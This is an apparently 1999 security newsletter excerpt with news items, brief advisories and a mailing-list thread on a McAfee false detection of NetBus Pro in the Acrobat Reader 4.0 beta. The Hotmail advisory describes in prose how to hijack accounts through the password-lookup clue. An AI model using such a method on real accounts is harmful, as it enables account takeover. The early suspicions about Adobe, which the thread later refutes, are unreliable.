~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Another Privacy Hole in IE 5.0?
by Chris Oakes
3:00 a.m. 16.Apr.99.PDT

An obscure feature in Microsoft's Internet Explorer 5.0 Web browser informs Web
sites when users bookmark their pages.

The feature was discovered during an audit of Wired Digital server logs by
software development manager Kevin Cooke and confirmed Thursday by Wired
News.

Microsoft called the privacy implications "
unfortunate" and said it is evaluting
changes to future releases of the browser to address the issue.

"
This is one of those things where we did not see the privacy issue when we were
creating the feature," said Microsoft product manager Mike Nichols. "The
feature doesn't pose a super-huge risk. But Microsoft is looking at ways of
modifying this feature in future releases."

@HWA

06.0 High tech on the battlefield
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/

WITH HIGH TECH AGAINST CYBERWARS
by BHZ, Friday 16th Apr 1999 on 3:15 pm CET
A device known as the End User Terminal, or EUI, a mobile, wireless computer
communication and tracking system, was one of several high-tech systems
demonstrated Wednesday as troops staged a raid on a mock city of cinderblock
buildings at Camp Pendleton, 40 miles north of San Diego. The EUT allows combat
troops to pinpoint the location of friendly and enemy troops in the area. Then they can
relay that information in real time back to commanders, who can then send in air
strikes or reinforcements. Worn like a backpack, the EUT includes an ultra- small
notebook computer, a power amplifier and global positioning system receiver. A
designer for Litton PRC of McClean, Va., said the 12-pound pack costs about $5,500.
Downsides on the system seem to be the fragileness of the system. Spectators
wandered what would happen if the computer took a beating on the battlefield,
became infected with chemical weapon residue or fell into enemy hands -- with
precise data on troop locations. Contributed by Thejian.

@HWA

07.0 Hotmail has similar vulnerabilty to last weeks rocketmail advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
from: http://securityhole.8m.com/

More Webmail Madness; Hotmail vulnerable - 18 April 1999

We released our Rocketmail advisory about a week ago, and decided to do some more
digging. This time we were able to get into an old Hotmail account of ours via the
password lookup function.Once the clue was given, a random string of letters and
numbers, we typed in the clue as the answer. This proved sufficient enough to be
taken to the next level, where we entered a new password. Once again, the mail
which was in the account was missing, probably deleted automatically after x amount
of days, but the original preferences, including name and location of the account
holder were still intact.

We hope Hotmail will try to fix this hole, which was also found in Rocketmail.
We recommend removing password lookup functions on all webmail sites, and deleting
accounts after 4 months of inactivity.

MAO Enterprises ERT

@HWA

08.0 MacPerl CGI vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~

Some MacPerl CGIs Reveal Server Pathnames - 10 April 1999

This is evidently the fault of diagnostic output utilized by some Perl CGIs
served via MacPerl and a webserver. When a CGI with diagnostic output
encounters an error, it prints (displays) the cause of the error in the script
in addition to the pathname of the file. The CGI is usually in the cgi-bin
directory of the webserver, so this is not new. However, it gives the full
path to the script. If the path is Server HD:Web Apps:Serving:Webstar 3.0:
cgi-bin:dumbscript.cgi, then that will be displayed for all to see. This poses
a problem. If a person with devious intent were to rename their own hard drive
as Server HD and create a series of folders with the same names as the folders
on the webserver's drives, and then make an alias of the end result, the alias
can be uploaded to the webserver, and it will be fuctional because the paths are
identical. A compressed alias uncompressed in a publically accessible area or in
a trojan application could be devestating due to the personal and sensetive
information possibly contained within.

We hope CGI developers will keep the paths to themselves from now on, and not
make it public information.

MAO Enterprises ERT

@HWA

09.0 The Adobe Acrobat NetBus scare thread;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date:Tue, 6 Apr 1999 07:41:06 -0600
Reply-To:"
Wamsley, James R" <WamslJR@LOUISVILLE.STORTEK.COM>
Sender:Windows NT BugTraq Mailing List <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>
From:"
Wamsley, James R" <WamslJR@LOUISVILLE.STORTEK.COM>
Subject:Adobe put Trojan horse in Acrobat.
Comments:To: "
firewall-wizards@nfr.com" <firewall-wizards@nfr.com>
Comments:cc: "
Samos, Randy B." <samos@anubis.network.com>

We recently found an alarming problem with Adobe's pre-release of Acrobat 4.0,
When one of our users downloaded and installed the pre-release, McAfee, using
data definitions 4.0.4017 stated that one file net bus pro.dr contained a virus
and could not be removed. Of course we investigated and see NetBus there. The
user opened a problem report with Adobe. They acknowledge that NetBus Pro is
part of the package, but 'have not been reported to cause problems with
anyone's computer at this time.'

I personally find this absolutely reprehensible that they would purposely put
'remote administration and spy software' in a package that will be widely
distributed around the world. That is all any of us need is the have a lot of
users install this, and the nefarious users obtain the whole package and start
whacking desktops whenever they choose.

Comments?

[ Jim Wamsley, Network Engineering
[ StorageTek
[ One StorageTek Drive, M.S. 4380, Louisville, CO 80028
[ Audible: (303) 673-8163 Logical jim_wamsley@stortek.com
[ Sed quis custodiet ipsos custodes - Juvenal, C. 100 C.E

----------------------------------------------------------------------------------------

Date:Wed, 7 Apr 1999 15:05:18 -0400
Reply-To:Russ <Russ.Cooper@RC.ON.CA>
Sender:Windows NT BugTraq Mailing List <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>
From:Russ <Russ.Cooper@RC.ON.CA>
Subject:Re: Adobe put Trojan horse in Acrobat.
Comments:To: "
Wamsley, James R" <WamslJR@LOUISVILLE.STORTEK.COM>

Interim Update:

James is in a seminar today, and while I was able to drag him out of it long
enough to ask a few questions, some will remain unanswered until tomorrow
(when he can get to the source messages he has).

- They found NetBusPro.dr in a pre-released version of Adobe Acrobat Reader 4.0
- They reportedly got a response from Adobe indicating it had been put there,
and that "
nobody has reported it to cause any problems".

When I spoke to Adobe Customer Service, they could not find any reference to
NetBus being included, officially, in any of their Acrobat released products.

Several posters have stated they do not find NetBus when scanning with McAfee
(various versions) against the released Adobe Acrobat 4.0 package (note, I
don't believe this is the same package James was referring to).

I received a message from one poster that included a snippet of a message he
received from a member of the anti-virus research community within which, was a
supposed response from McAfee. McAfee was supposedly acknowledging that this
was a false detection within their 4.0.4017 .DAT file. The response said that
this would be fixed "
in a future update of the .DAT files).

I downloaded and checked the McAfee 4.0.4019 .DAT file WhatsNew.txt file, but it
makes no mention of any false detection, or whether or not its been corrected.
James has not scanned it with 4.0.4019 so cannot say if it has, in fact,
disappeared or not.

My apologies for how long this response has taken. James' message caused a
flood of responses and I had hoped to get him to give us some more facts. It
took me a while to track down his pager number (ain't social engineering fun!),
hence the delay.

I have messages into the senior researchers at NAI, but as yet they haven't
responded either. Without accurate info about precisely where James got
precisely what, its hard to ask Adobe many more questions than I already have.
I truly goofed in sending this one out without a little more clarification in
advanced...tsk, tsk...

More when something useful arises.

Cheers, Russ - NTBugtraq moderator

----------------------------------------------------------------------------------------

Date:Thu, 8 Apr 1999 21:33:18 -0400
Reply-To:Russ <Russ.Cooper@RC.ON.CA>
Sender:Windows NT BugTraq Mailing List <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>
From:Russ <Russ.Cooper@RC.ON.CA>
Subject:Re: Adobe put Trojan horse in Acrobat.

Well, I guess neither NAI nor Adobe think enough of us to warrant us with their
direct response, so instead, you get me...;-]

Last night, I spoke with Vincent Gullotto, Manager of AV Researchers at AVERT,
the Supreme Beings of NAI's Anti-Virus crowd. I had sent him a message early
yesterday about the Adobe issue and wanted his confirmation after I had
received a redirected note originating from DataFellows quoting confirmation
from McAfee that the detection of NetBusPro in the pre-release of Adobe Reader
4.0 was, in fact, a mis-detection.

Well, Vincent was nice enough to confirm to me that it was, in fact, a
mis-detection. He agreed that his group would confirm this to NTBugtraq, but he
needed some confirmation from his researchers regarding precisely which versions
of their .DAT files were mis-detecting. "Tomorrow", he said.

I figured that many of you would not accept a simple explanation from Adobe, or a
3rd party confirmation from DataFellows. I spoke to, indirectly, PR people at
Adobe.Seems Adobe is going to publish something on Saturday (gee, thanks for
being so quick Frank). I figured, well, this wasn't going to convince you either.

I stressed to Vincent the need to have NAI confirm the mis-detection. Gee, he
agreed, but here we are and still no confirmation.

Now I've never been one to hide my disdain for the way NAI handles important
issues, but I figured after a person-to-person conversation that I took the
trouble to initiate, and after him telling me point blank that we'd see
something today...sigh...oh well, guess I had higher expectations than I should
have.

So, take my word for it, both NAI and Adobe say the detection of NetBusPro in
the pre-release of Adobe Reader 4.0 was a mis-detection.

That said, Adobe did confirm that there was a file in that version called
NetBusPro.dr. Now ask yourself, who would be stupid enough to call a file in,
even, a pre-release package such a significantly suspicious name as NetBus?
Adobe and NAI both seem suspiciously silent about this fact. Did NAI detect
something and Adobe convinced them to call it a mis-detection? Did Adobe
incorporate NetBusPro into their product and sufficiently hide it, maybe with
NAI cooperation, such that detection programs don't see it anymore?

I have a copy of a message from service@adobe.com which states that
NetBusPro.dr is, in fact, included in the pre-release. That same message
includes links to the NetBus home page, as if to say, "if you want to know
what this thing does, the thing we included in this package, go here and
you'll find out"
. Another message I have from Adobe internal says that
they've been seeing this rumor for a week now, and on lists where they don't
have dedicated lurkers to dispel such rumors, its run rampant.

If you don't know me, let me tell you. I'm pretty good at getting to the
bottom of things with any company. The fact that Adobe is so unconcerned
about this "rumor" that they're not publishing anything to dispel it until
Saturday stinks of other issues to me. The fact that NAI, despite a personal
confirmation and agreement to publish a statement, still have not, also
stinks of other issues to me.

In the spirit of "better safe than sorry", I'd say this. Stay away from Adobe
Acrobat Reader 4.0 and NAI scanners until this thing has been clarified beyond
a shadow of a doubt (and if you ask me, I don't know how that is now possible).

Draw your own conclusions. DateFellows had a page up about NetBus earlier today,
which I saw, at http://www.europe.datafellows.com/v-descs/netbus.htm, which now
seems to be unavailable. I had personal messages from folks at DataFellows
confirming it was a mis-detection, but they weren't prepared to state this on
the list.

As a responsible White Hat I wanted to get NAI to confirm it was a mis-detection,
and put the whole issue to rest. But as a responsible journalist, I figure the
above is the best you can expect, at least for now.

A fine line, I know, but if you'd been told what I've been told, I suspect you'd
be thinking like me.

Cheers, Russ - NTBugtraq moderator

----------------------------------------------------------------------------------------

Date: Thu, 8 Apr 1999 19:08:42 -0700
From: Sarah Rosenbaum <srosenba@ADOBE.COM>
To: BUGTRAQ@netspace.org
Subject: ALERT: No viruses in Acrobat Reader

The public beta release of Acrobat Reader 4.0, posted on www.adobe.com in
early March was rumored to contain a virus. This is a false report.

McAfee VirusScan 4.x.x for Windows using the 4.0.4017 Virus DAT file
released March 15, 1999 reported that the pre-release version had the
NetBusPro.dr virus, but this was due to an imprecise virus specification
within the 4.0.4017 Virus DAT file itself.

The 4.0.4019 Virus DAT file released by Network Associates on March 29,
1999 corrects the problem and shows that the file is free of viruses.Both
the virus lab at Network Associates and Adobe Systems Inc have confirmed
this fix.

BTW, the 4.0.4015 Virus DAT file that was current as of early March had
also shown the file to be free of viruses.

All pre-release and release versions of Acrobat 4.0 Reader are free of
known viruses.Adobe uses a number of virus scanning utilities, in
addition to McAfee, to thoroughly screen all software before it is released
publicly.Thank you for your attention in this matter.

Sarah
-------------------------------------------------------------------------
Sarah Rosenbaum Adobe Systems Incorporated
Group Product Manager 345 Park Avenue, MS E14
Adobe Acrobat San Jose, CA95110
408-536-3844 (v)srosenba@adobe.com
408-537-4005 (f)www.adobe.com/acrobat
------------------------------------------------------------------------

----------------------------------------------------------------------------------------

Date: Fri, 9 Apr 1999 11:27:16 -0400
From: Russ <Russ.Cooper@RC.ON.CA>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: FW: A post on you NT Bugtrack

Here's the message I received from NAI last night, shortly after my
message went out to the list. Unfortunately it was sent directly to me
rather than to the list itself.

Cheers,
Russ - NTBugtraq moderator

-----Original Message-----
>From: Gullotto, Vincent [mailto:Vincent_Gullotto@NAI.com]
Sent: Thursday, April 08, 1999 10:16 PM
To: 'Russ'
Subject: A post on you NT Bugtrack


As we spoke about yesteday and I did confirm and agree to provide you
and
your readers a response here is a statement from AVERT, A Division of
NAI
Labs.

The topic discussed in the NT BugTrack Subject:"Adobe put Trojan horse
in
Acrobat"
was initially brought to our attention on 3/19/99.The
detection
of the NetBusPro tool in the ar40.exe file was incorrect.This occurs
with
the 4017 and 4018 DAT sets for McAfee and Dr Solomon VirusScan 4.XX
products, which were posted on March 17th and March 24th to the AVERT
Labs
web page. The correction was made to the 4019 DAT set which were
posted on
March 29 on NAI's FTP site.

Vincent Gullotto
Manager, AV Research
AVERT-NAI Labs
www.avertlabs.com <http://www.avertlabs.com>

----------------------------------------------------------------------------------------

Date: Fri, 9 Apr 1999 14:19:34 -0400
From: Russ <Russ.Cooper@RC.ON.CA>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: Adobe put Trojan horse in Acrobat.

I've just put an editorial on the Adobe issue up on the NTBugtraq site,
it includes the source information I received that has led me to make
some of the statements I have. Many people asked me to disclose more of
what I had in support of my comments.

Check out the revised News bulletin on the NTBugtraq Home Page,
http://ntbugtraq.ntadvice.com, titled "NetBusPro in Adobe? You decide!".

Cheers,
Russ - NTBugtraq moderator

----------

[http://ntbugtraq.ntadvice.com/default.asp?sid=1&pid=47&aid=28]

What's up with Adobe?
Written by Russ Cooper - 4/9/99 12:42:42 PM

Preface:
Due to over-whelming response, this page is an attempt to disclose what information I have received regarding this issue. While some of the information is verbatim
copy I've received from others, I should make it clear that I have altered some information in order to protect sources. I hope that my reputation as a responsible and
reliable source of accurate information is not tainted by this fact.

In addition, this page also contains speculative observation and editorial commentary. I personally have not been able to investigate the true purpose of any

  
component
within the Adobe Acrobat Reader pre-release 4.0. I do not intend to, I leave that task to others who are more capable in this regard. I would appreciate hearing any
findings, email me at russ.cooper@rc.on.ca.

I hope this allows you to draw your own conclusions. I hope this will also encourage both Adobe and Network Associates, Inc. to better communicate with its user
community over issues as sensitive as this one is.

History:

The alarm raised by Jim Wamsley of StorageTek <http://ntbugtraq.ntadvice.com/default.asp?pid=36&sid=1&A2=ind9904&L=ntbugtraq&F=P&S=&P=779> over the possible presence of NetBusPro within the Adobe Acrobat Reader pre-release 4.0 <ftp://ftp.adobe.com/pub/adobe/acrobatreader/win/4.x/beta/ar40.zip> was, I thought, of import to
NT Security-minded folks everywhere. McAfee's anti-virus definition file (.DAT file) version 4.0.4017 told him that it believed NetBusPro might be included in the
AR40.EXE file (extracted from the downloaded AR40.zip file from Adobe's FTP site) <ftp://ftp.adobe.com/pub/adobe/acrobatreader/win/4.x/beta/ar40.zip>.

James had received this warning from one of his users and, correctly IMO, alerted NTBugtraq.

James' user went to Adobe's Tech Support web site and submitted a question to them. A response was ultimately sent to that user from a generic Adobe Service
account (service@adobe.com). The edited response follows (it has been edited because it contained not only the user name and email address, but also IP address
information of the user. The Adobe "Thread Number", a tracking number they use, has also been omitted. Anyone from Adobe who would like this number is welcome to
contact me for it);


-----Original Message-----
From: service@Adobe.COM [mailto:service@Adobe.COM]
Sent: Friday, April 02, 1999 10:34 AM
To: xxxxxxx@stortek.com
Subject:

Hello xxx,

Thank you for taking the time to alert us of the presence of a possible virus in the Acrobat Reader 4.0 Pre-release download.

Although we have received reports of this virus from a number of different sources, our engineers have not found the presence of an actual virus in the
posted file. NetBus Pro is the name of a software application from another company, and we suspect that the NetBusPro.dr file within the Acrobat Reader
4.0 Pre-release is being mistakenly reported as a virus (although this has not yet been confirmed).

We do know for certain that the Acrobat Reader 4.0 Pre-release (Ar40.exe) has not been reported to cause problems with anyone's computer at this time.

To obtain a version of the Acrobat Reader 4.0 Pre-release that has been verified not to produce any virus messages with McAfee, please download it from
the following ftp site:

ftp://ftp.adobe.com/pub/adobe/acrobatreader/win/4.x/beta/ar40.zip

For more information on NetBus Pro, please visit the following website: http://NetBus.Org/main.html

Also, visit the following URL on the Adobe Web site for the latest customer service and technical information:
http://www.adobe.com/supportservice/custsupport/main.html

Thank you for contacting Adobe Customer Support via the Adobe Web site.

Best regards,
Adobe Customer Support

THREAD:xxxxxxxxxxxxxxxxxxxxx
The thread number (above) is your reference number for this issue. Thank you for visiting www.adobe.com. We hope this reply answers your question.
Inquiries such as yours often prompt us to update or add information to www.adobe.com so it can be available to other customers. Please return to
www.adobe.com for additional information and inquiries. Copyright 1999 Adobe Systems Incorporated
--- On 03/16/99, you wrote ---
WebSite: Adobe.com
ProblemType: Other
WebURL: http://www.adobe.com/
CONTENT_LENGTH = 741
CONTENT_TYPE = application/x-www-form-urlencoded
GATEWAY_INTERFACE = CGI/1.1
HTTPS = OFF
HTTP_ACCEPT = application/vnd.ms-excel, application/msword,application/vnd.ms-powerpoint, image/gif, image/x-xbitmap, image/jpeg,image/pjpeg, */*
HTTP_ACCEPT_ENCODING = gzip, deflate
HTTP_ACCEPT_LANGUAGE = en-us
HTTP_COOKIE = AWID_9.80.22.140:10745:918855192:81;WECCIDCookie932364811728316
HTTP_FORWARDED = by http://xxxxxx.xxxxxxx.xxx:80 (Netscape-Proxy/3.5)
HTTP_HOST = cgi1.adobe.com
HTTP_PRAGMA = no-cache
HTTP_REFERER = http://www.adobe.com/misc/webform.html
HTTP_USER_AGENT = Mozilla/4.0 (compatible; MSIE 5.0b2; Windows NT)
PATH = /usr/sbin:/usr/bin
REMOTE_ADDR = xxx.xxx.xxx.xxx
REMOTE_HOST = xxx.xxx.xxx.xxx
REQUEST_METHOD = POST
SCRIPT_NAME = /misc/comments04.cgi
SERVER_NAME = cgi1.adobe.com
SERVER_PORT = 80
SERVER_PROTOCOL = HTTP/1.0
SERVER_SOFTWARE = Netscape-Commerce/1.12
SERVER_URL = http://cgi1.adobe.com
TZ = US/Pacific
The virus scan program I'm using (McAfee) says there is a virus in the AR40.exe file that is part of the Adobe Acrobat .zip file I just downloaded. VirusScan
says it is a "NetBusPro" virus and can't remove it. My company's team responsible for virus things say it is a new version of NetBus, which is a Trojan
Horse virus. Please contact me about this. --- original message ends ---


Now as you can see, this certainly comes across as Adobe confirming the presence of a file called NetBusPro.dr. I have installed the same version that this person was
referring to and cannot find a file anywhere on my system called NetBusPro.dr, however this does not mean its not present as the Adobe Server Rep. states.

Its also worth pointing out that Adobe does not state, even in their public announcement <http://listserv.netspace.org/cgi-bin/wa?A2=ind9904b&L=bugtraq&F=&S=&P=1246> on the issue posted to Bugtraq, that the program in question does not have
NetBusPro in it, they merely say it is free of viruses. I'm normally a trusting individual, but Adobe's lack of making an unequivocal statement that NetBusPro is not
present would seem to have been the right thing to do.

In the copy of the Adobe Internal Engineering document referencing this supposed false detection, a paragraph is present which is not present in the public Adobe
statement; <http://listserv.netspace.org/cgi-bin/wa?A2=ind9904b&L=bugtraq&F=&S=&P=1246>


"NetBus Pro 2.0 by Carl-Fredrik Neikter is a remote administration and spy tool. It enables you to remotely administer computers. Earlier versions of
NetBus were used illicitly by people who create viruses to play tricks on other people by enabling them to remotely control their computers. These viruses
involving NetBus were known as NETBUS.153 and NETBUS.160. NetBus Pro 2.0 is more robust than earlier versions known as NetBus, and NetBus Pro 2.0
is significantly more difficult to distribute as a virus."


Again, they seem more than willing to give praise to the NetBusPro product and make an attempt to differentiate its characteristic as a "virus" from earlier versions.

Shortly after I sent James' message through to NTBugtraq I sent messages to 4 individuals at Network Associates, Inc.'s AVERT Labs <http://www.avertlabs.com>, including Vincent Gullotto,
Manager of AV Researchers (sent on 4/7/99 1:51pm EDT). Vincent had previously offered these contacts for virus-related issues. My message said;


I released information this morning regarding the supposed inclusion of NetBus in Adobe Acrobat 4.0 based on McAfee 4.0.4017 identifying it being present
in AR40.EXE.

I've subsequently received a message stating that this was a mis-detection by your virus scanner. The poster included text supposedly originating from
McAfee, but I have been unable to find it on your web site. The text was;

-----------------------
This file AR40.EXE for Adobe Acrobat Reader 4.0 is identified by .DAT 4017 as containing "NetBusPro.dr" trojan:

Scanning file D:\!VIRUS\ar40.exe
D:\!VIRUS\ar40.exe could have NetBusPro.dr trojan !!!

This is a false detection. This will be corrected in a future update of the .DAT files. Also thank you for the sample referred to as XXXXXX. It has been
forwarded to our researchers for examination and a researcher will get back to you with our findings. -----------------------

Could you please confirm this, and if possible, provide a link to a publicly accessible statement from McAfee on this? Alternatively, could you have
someone respond directly to NTBugtraq@listserv.ntbugtraq.com re-stating the above.

Your quick reply would be greatly appreciated. I would also greatly appreciate a direct phone number for any of you.

Cheers,
Russ - NTBugtraq moderator


The included quote originated from a respected AV Researcher with DataFellows, and seems to have been sent to a number of people (despite this, I won't disclose the
sources). Virtually the same wording ended up on DataFellows Web Site <http://www.europe.datafellows.com/v-descs/netbus.htm> late yesterday (btw, they have told me it was unavailable when I went to look at it yesterday
simply due to the volume of hits it was receiving).

At ~5:30pm EDT on 4/7/99 I called Vincent directly and spoke with him and one of his researchers about the issue. I stressed that we (NTBugtraq) needed a
confirmation message from NAI to clarify the issue. I asked about NAI's policy regarding mis-detections and was told they do not make the information public. Not that
they don't want to, only that they hadn't yet gotten around to placing the information somewhere on their web sites. Of course I pointed out that it could be included
in their WhatsNew.txt file included in each .DAT file update, and he said he would consider what could be done.

Meanwhile, it was agreed that NAI would post something to the list, as a direct response to my message to the list, that clarified what had happened. Vincent indicated
that he needed to talk to an AV Researcher in the U.K. to determine precisely which .DAT file versions caused a mis-detection. Since it was already after U.K. closing,
NTBugtraq could expect a message the following day (4/8/99). I certainly appreciated his thoroughness, and more than appreciated his cooperation in discussing the
issues with me personally.

Its probably reasonable to point out here that I stressed to Vincent my understanding of how mis-detections happen. I have no expectation that mis-detections will
not occur, of course I hope they will be few and far between like he does, but they're bound to happen. I fully support any AV vendor who's product happens to
mis-detect a virus, better safe than sorry. I pointed out, however, that its just as important to make disclosure of mis-detections. A number of messages I received in
response to the original issue pointed out to me the harm they had been subjected to by people claiming they were being sent infected documents or files...claims made
due to mis-detections. Its one thing for me to tell you that something is a mis-detection, but I would hope you'd only believe it if the AV vendor said so.

After waiting until 9:30 EST on 4/8/99, after closing for the U.S., for a message from NAI clarifying the issue, I felt I should post something <http://ntbugtraq.ntadvice.com/default.asp?pid=36&sid=1&A2=ind9904&L=ntbugtraq&F=P&S=&P=1323>. The volume of messages I
was receiving on the issue indicated that many people felt it was an important issue.

By this time I had spent a great deal of time thinking about the various aspects of this whole affair. Adobe seemed to be pointing people to NetBus, and seemed
unwilling to outright state it was not in their product. NAI had promised a message to the list, but none materialized.

I started to ask myself just how the mis-detection worked, and more importantly, how it could be corrected! Was VirusScan simply detecting the word "NetBusPro"
somewhere in the file? According to my discussions with NAI, the mis-detection came from the reader containing "an icon that was very similar to one found in
NetBusPro" as well as "some header material that was very similar". So did Adobe change an icon in the final release to stop the mis-detection? Or did NAI say to its
.DAT file "if you see something that looks like NetBusPro in Adobe Acrobat Reader 4.0, ignore it, its not NetBusPro!"??

No doubt AV Researchers can better explain why mis-detections happen, and how application vendors can make software that causes mis-detections, but both
parties lackadaisical attitude to the issue just left me feeling like something was missing.

I thought it reasonable that maybe Adobe included NetBusPro in the pre-release of their Reader in order to assist them during the beta testing phase. Might make
sense, and they may have satisfied themselves that NetBusPro was the right product to assist them. Of course there should have been mention of this in the docs
somewhere, and they should have acknowledged it in their announcement to the public. But I wouldn't expect NAI to remove detection of it, regardless of why it might
be there.

Did the NetBusPro folks get on NAI's back and tell them to stop detecting their now commercial version of the product as a Trojan?? If I were the owners of
NetBusPro, and I was trying to sell it commercially, I certainly wouldn't be pleased that AV vendors were telling my users its a Trojan and shouldn't be trusted, would
you?

Or is it all just a simple issue of VirusScan simply being a bit too broad in its signature matching routines and picking up something completely unrelated to NetBusPro
and thinking it was NetBusPro? This is probably the case, but I ask myself, how will I ever know??

I'm not a conspiracy theorist like some of my on-line friends...(Hi Bill...;-])...but clearly there needs to be a more effective mechanism of handling these issues that is
convincing enough to quell any suggestion of suspicious behavior. Unfortunately, I don't have an answer for that right now, hence my skepticism.

Hopefully one of you with the ability to decompile and analyze code will be able to tell us, for certain, whether or not there is any NetBusPro functionality in the Adobe
Acrobat Reader pre-release 4.0. Hopefully Adobe will make an unequivocal statement that there is not such functionality in any version of their product. Hopefully NAI,
and all AV vendors, will start making lists of mis-detections available to the public as and when they happen.

Hopefully I haven't over-hyped this issue, and instead, have helped somewhat to make such issues less worrisome in the future. That was my intent.

Cheers,
Russ - NTBugtraq moderator
comments welcome...

----------------------------------------------------------------------------------------

Date: Mon, 12 Apr 1999 08:04:20 -0400
From: Russ <Russ.Cooper@RC.ON.CA>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: FW: ALERT: No viruses in Acrobat Reader

[ The following text is in the "iso-8859-1" character set. ]
[ Your display is set for the "US-ASCII" character set.]
[ Some characters may be displayed incorrectly. ]

Received: from smtp-relay-1.adobe.com ([192.150.11.1]) by
ns.ntbugtraq.com with SMTP (Microsoft Exchange Internet Mail Service
Version 5.5.1960.3)
| id H1GPKN43; Sun, 11 Apr 1999 23:02:50 -0400
Received: from inner-relay-1.Adobe.COM ([153.32.1.51] (may be forged))
| by smtp-relay-1.Adobe.COM (8.8.6) with ESMTP id TAA23125
| for < Russ.Cooper@rc.on.ca>; Sun, 11 Apr 1999 19:57:16 -0700 (PDT)
Received: from mail-321.corp.Adobe.COM|by inner-relay-1.Adobe.COM
(8.8.5) with ESMTP id UAA15768; Sun, 11 Apr 1999 20:02:44 -0700 (PDT)
Received: from sarahtp600|by mail-321.corp.Adobe.COM (8.7.5) with SMTP
id UAA08101; Sun, 11 Apr 1999 20:02:41 -0700 (PDT)
Message-Id: < 4.1.19990411190139.00afeda0@mail-321.corp.adobe.com>
X-Sender: srosenba@mail-321.corp.adobe.com
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
Date: Sun, 11 Apr 1999 19:55:55 -0700
To: Russ < Russ.Cooper@rc.on.ca>
>From: Sarah Rosenbaum < srosenba@Adobe.COM>
Subject: RE: ALERT: No viruses in Acrobat Reader
In-Reply-To: < 61143C10CC8AD211A2F10000F878E683066F9C@ns.rc.on.ca>
Mime-Version: 1.0

-----Original Message-----
>From: Sarah Rosenbaum [mailto:srosenba@Adobe.COM]
Sent: Sunday, April 11, 1999 10:56 PM
To: Russ
Subject: RE: ALERT: No viruses in Acrobat Reader


Dear Mr. Cooper,

Below is an additional statement regarding the false reports that the
Adobe Acrobat Reader pre-relese contained a "virus," or more
specifically, the NetBusPro software. Although we believe the original
statements from Adobe Systems Incorporated and Network Associates, Inc.
last Thursday (April 8) clearly refuted the false report, your
commentary on this issue on www.ntbugtraq.com suggests that you did not
find such statements unequivocal.

We appreciate the service your web site provides to the software
industry. However, given the rapidity with which false informaiton can
spread over the internet, we would appreciate that great care be taken
to verify information that can so seiruosly harm a developer of top
quality software. As you know, Adobe products are highly regarded. False
reports such as these are damaging and also require a use of Adobe's
resources which are better spent contributing to innovation.

Thank you for posting the information below to your web site. For
further information, please don't hestitate to contact me.

Regards,
Sarah
------------------------------------------------------------------------
-
Sarah Rosenbaum | | | | | | |Adobe Systems Incorporated
Group Product Manager| || | | | | | |345 Park Avenue, MS E14
Adobe Acrobat| || | | | | | || | | | | | |San Jose, CA|95110
408-536-3844 (v)| | | | | | || | | | | | || | | | | | |srosenba@adobe.com
408-537-4005 (f)| | | | | | || | | | | | || | | | | | |www.adobe.com/acrobat
------------------------------------------------------------------------

Subject: NO NetBusPro IN ADOBE ACROBAT READER

Adobe software, such as Acrobat Reader, does not include, nor did it
ever include, any NetBus or NetBusPro software.

McAfee VirusScan 4.x falsely reported the NetBusPro.dr software when
scanning Ar40.exe and Ar40eng.exe pre-release software when using virus
definitions 4.0.4017. The virus alert was caused by an error in version
4.0.4017 of the virus definition file distributed Network Associates,
Inc. This has been confirmed by the virus lab at Network Associates,
Inc. and by Adobe Systems Incorporated.When you install virus
definitions 4.0.4019, VirusScan 4.x does not report an eror with
Ar40.exe or Ar40eng.exe.

Adobe uses a variety of anti-virus software in addition to McAfee
VirusScan to thoroughly screen all software before it is publicly
released.

There was some confusion from original reports because NetBusPro is
described as both a virus and a "trojan horse". It is a common confusion
because software such as NetBusPro is sometimes picked up by virus
detection software.

Regards,
Sarah Rosenbaum
------------------------------------------------------------------------
-
Sarah Rosenbaum | | | | | | |Adobe Systems Incorporated
Group Product Manager| || | | | | | |345 Park Avenue, MS E14
Adobe Acrobat| || | | | | | || | | | | | |San Jose, CA|95110
408-536-3844 (v)| | | | | | || | | | | | || | | | | | |srosenba@adobe.com
408-537-4005 (f)| | | | | | || | | | | | || | | | | | |www.adobe.com/acrobat
------------------------------------------------------------------------


At 01:28 PM 4/10/99 -0400, you wrote:
>Could you get Adobe to confirm, publicly, that Adobe Acrobat Reader
4.0,
>any version be it beta or otherwise, never has, and does not, contain
>components, or the complete version, of NetBusPro 2.x?
>
>NetBus v1.xx is considered a "virus", or a Trojan actually, but the
>commercial product NetBusPro 2.x is not considered as such.
>
>Adobe's public statement, sent in your name, does not make this
>distinction sufficiently for many of my 24,000+ subscribers (or me).
>
>Such a clarification, in public, either on your web site or via email,
>would put this matter to rest once and for all.
>
>Cheers,
>Russ - NTBugtraq moderator
>List address: NTBugtraq@listserv.ntbugtraq.com
>Web site: http://ntbugtraq.ntadvice.com
>

-------------------------------------------------------------------------------

Adobe Conclusion - Part 1
Written by Russ Cooper - 4/13/99 5:38:47 PM

I spoke with a wonderful PR fella at Adobe named Tim Oey this afternoon. I've been travelling since Sunday morning so this is why you haven't seen much from me
lately. Anyway, so Tim's all anxious for me to get a change up on my web site regarding the latest breaking news from them (meaning I should change my site to
reflect information Sarah sent me in private on Sunday which I published yesterday). I got a chuckle out of the fact he figured I should've changed my site overnight
when its taken them more than 2 weeks to get something up on theirs...but that's another story.

To the heart of the matter;

In my editorial, http://ntbugtraq.ntadvice.com/default.asp?sid=1&pid=47&aid=28 (which I will be referring to as "my Adobe editorial" from now on), I said;

"Its also worth pointing out that Adobe does not state, even in their public announcement on the issue posted to Bugtraq, that the program in question
does not have NetBusPro in it, they merely say it is free of viruses. I'm normally a trusting individual, but Adobe's lack of making an unequivocal
statement that NetBusPro is not present would seem to have been the right thing to do."

to wit, Tim sent me this URL today;

